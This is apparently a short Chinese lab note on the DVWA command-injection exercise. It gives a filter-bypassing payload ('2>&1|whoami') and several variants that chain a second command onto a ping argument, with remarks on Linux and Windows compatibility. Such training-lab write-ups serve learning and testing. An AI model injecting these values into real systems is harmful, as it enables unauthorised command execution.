DVWA 低中高级别只不过对过滤字符串设置不同而已(都采用黑名单),考虑网站可能部署在不同操作系统,所以直接提供最通用的方式:2>&1|whoami(高级中过滤了|,注意不能带空格),不同级别不同部署环境均可执行,且过滤掉不需要的输出。
其他可测试命令及优缺点举例
# `ping -c 4 ` 是代码中用来拼接命令字符串的前半部分,后面为提交的输入ping -c 4 127.1 && whoami # 有其他输出,且最容易被过滤ping -c 4 127.1 & whoami # 在 Linux 下不适用:& 是作为后台执行的ping -c 4 127.1 ; whoami # 在 Windows 下不适用:; 不是命令分隔符ping -c 4 || whoami # 有其他输出ping -c 4 `whoami` # 在 Windows 下不适用:没有命令替换操作ping -c 4 $HOME # 返回 $HOME 变量值,在 Windows 下不适用
若有收获,就点个赞吧
0 人点赞
